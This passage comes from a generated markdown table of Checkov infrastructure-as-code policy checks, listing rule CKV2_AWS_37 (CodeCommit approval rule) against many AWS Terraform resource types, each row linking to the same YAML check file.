| Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 876 | CKV2_AWS_37 | resource | aws_iot_thing | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 877 | CKV2_AWS_37 | resource | aws_iot_thing_principal_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 878 | CKV2_AWS_37 | resource | aws_iot_thing_type | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 879 | CKV2_AWS_37 | resource | aws_iot_topic_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 880 | CKV2_AWS_37 | resource | aws_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 881 | CKV2_AWS_37 | resource | aws_kinesis_analytics_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 882 | CKV2_AWS_37 | resource | aws_kinesis_firehose_delivery_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 883 | CKV2_AWS_37 | resource | aws_kinesis_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 884 | CKV2_AWS_37 | resource | aws_kinesis_video_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 885 | CKV2_AWS_37 | resource | aws_kms_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 886 | CKV2_AWS_37 | resource | aws_kms_ciphertext | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 887 | CKV2_AWS_37 | resource | aws_kms_external_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 888 | CKV2_AWS_37 | resource | aws_kms_grant | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 889 | CKV2_AWS_37 | resource | aws_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 890 | CKV2_AWS_37 | resource | aws_lambda_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 891 | CKV2_AWS_37 | resource | aws_lambda_event_source_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 892 | CKV2_AWS_37 | resource | aws_lambda_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 893 | CKV2_AWS_37 | resource | aws_lambda_function_event_invoke_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 894 | CKV2_AWS_37 | resource | aws_lambda_layer_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 895 | CKV2_AWS_37 | resource | aws_lambda_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 896 | CKV2_AWS_37 | resource | aws_lambda_provisioned_concurrency_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 897 | CKV2_AWS_37 | resource | aws_launch_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 898 | CKV2_AWS_37 | resource | aws_launch_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 899 | CKV2_AWS_37 | resource | aws_lb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 900 | CKV2_AWS_37 | resource | aws_lb_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 901 | CKV2_AWS_37 | resource | aws_lb_listener | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 902 | CKV2_AWS_37 | resource | aws_lb_listener_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 903 | CKV2_AWS_37 | resource | aws_lb_listener_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 904 | CKV2_AWS_37 | resource | aws_lb_ssl_negotiation_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 905 | CKV2_AWS_37 | resource | aws_lb_target_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 906 | CKV2_AWS_37 | resource | aws_lb_target_group_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 907 | CKV2_AWS_37 | resource | aws_licensemanager_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 908 | CKV2_AWS_37 | resource | aws_licensemanager_license_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 909 | CKV2_AWS_37 | resource | aws_lightsail_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 910 | CKV2_AWS_37 | resource | aws_lightsail_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 911 | CKV2_AWS_37 | resource | aws_lightsail_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 912 | CKV2_AWS_37 | resource | aws_lightsail_static_ip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 913 | CKV2_AWS_37 | resource | aws_lightsail_static_ip_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 914 | CKV2_AWS_37 | resource | aws_load_balancer_backend_server_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 915 | CKV2_AWS_37 | resource | aws_load_balancer_listener_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 916 | CKV2_AWS_37 | resource | aws_load_balancer_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 917 | CKV2_AWS_37 | resource | aws_macie_member_account_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 918 | CKV2_AWS_37 | resource | aws_macie_s3_bucket_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 919 | CKV2_AWS_37 | resource | aws_main_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 920 | CKV2_AWS_37 | resource | aws_media_convert_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 921 | CKV2_AWS_37 | resource | aws_media_package_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 922 | CKV2_AWS_37 | resource | aws_media_store_container | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 923 | CKV2_AWS_37 | resource | aws_media_store_container_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 924 | CKV2_AWS_37 | resource | aws_mq_broker | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 925 | CKV2_AWS_37 | resource | aws_mq_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 926 | CKV2_AWS_37 | resource | aws_msk_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 927 | CKV2_AWS_37 | resource | aws_msk_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 928 | CKV2_AWS_37 | resource | aws_nat_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 929 | CKV2_AWS_37 | resource | aws_neptune_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 930 | CKV2_AWS_37 | resource | aws_neptune_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 931 | CKV2_AWS_37 | resource | aws_neptune_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 932 | CKV2_AWS_37 | resource | aws_neptune_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 933 | CKV2_AWS_37 | resource | aws_neptune_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 934 | CKV2_AWS_37 | resource | aws_neptune_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 935 | CKV2_AWS_37 | resource | aws_neptune_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 936 | CKV2_AWS_37 | resource | aws_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 937 | CKV2_AWS_37 | resource | aws_network_acl_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 938 | CKV2_AWS_37 | resource | aws_network_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 939 | CKV2_AWS_37 | resource | aws_network_interface_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 940 | CKV2_AWS_37 | resource | aws_network_interface_sg_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 941 | CKV2_AWS_37 | resource | aws_opsworks_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 942 | CKV2_AWS_37 | resource | aws_opsworks_custom_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 943 | CKV2_AWS_37 | resource | aws_opsworks_ganglia_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 944 | CKV2_AWS_37 | resource | aws_opsworks_haproxy_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 945 | CKV2_AWS_37 | resource | aws_opsworks_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 946 | CKV2_AWS_37 | resource | aws_opsworks_java_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 947 | CKV2_AWS_37 | resource | aws_opsworks_memcached_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 948 | CKV2_AWS_37 | resource | aws_opsworks_mysql_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 949 | CKV2_AWS_37 | resource | aws_opsworks_nodejs_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 950 | CKV2_AWS_37 | resource | aws_opsworks_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 951 | CKV2_AWS_37 | resource | aws_opsworks_php_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 952 | CKV2_AWS_37 | resource | aws_opsworks_rails_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 953 | CKV2_AWS_37 | resource | aws_opsworks_rds_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 954 | CKV2_AWS_37 | resource | aws_opsworks_stack | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 955 | CKV2_AWS_37 | resource | aws_opsworks_static_web_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 956 | CKV2_AWS_37 | resource | aws_opsworks_user_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 957 | CKV2_AWS_37 | resource | aws_organizations_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 958 | CKV2_AWS_37 | resource | aws_organizations_organization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 959 | CKV2_AWS_37 | resource | aws_organizations_organizational_unit | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 960 | CKV2_AWS_37 | resource | aws_organizations_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 961 | CKV2_AWS_37 | resource | aws_organizations_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 962 | CKV2_AWS_37 | resource | aws_pinpoint_adm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 963 | CKV2_AWS_37 | resource | aws_pinpoint_apns_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 964 | CKV2_AWS_37 | resource | aws_pinpoint_apns_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 965 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 966 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 967 | CKV2_AWS_37 | resource | aws_pinpoint_app | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 968 | CKV2_AWS_37 | resource | aws_pinpoint_baidu_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 969 | CKV2_AWS_37 | resource | aws_pinpoint_email_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 970 | CKV2_AWS_37 | resource | aws_pinpoint_event_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 971 | CKV2_AWS_37 | resource | aws_pinpoint_gcm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 972 | CKV2_AWS_37 | resource | aws_pinpoint_sms_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 973 | CKV2_AWS_37 | resource | aws_placement_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 974 | CKV2_AWS_37 | resource | aws_proxy_protocol_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 975 | CKV2_AWS_37 | resource | aws_qldb_ledger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 976 | CKV2_AWS_37 | resource | aws_quicksight_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 977 | CKV2_AWS_37 | resource | aws_quicksight_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 978 | CKV2_AWS_37 | resource | aws_ram_principal_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 979 | CKV2_AWS_37 | resource | aws_ram_resource_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 980 | CKV2_AWS_37 | resource | aws_ram_resource_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 981 | 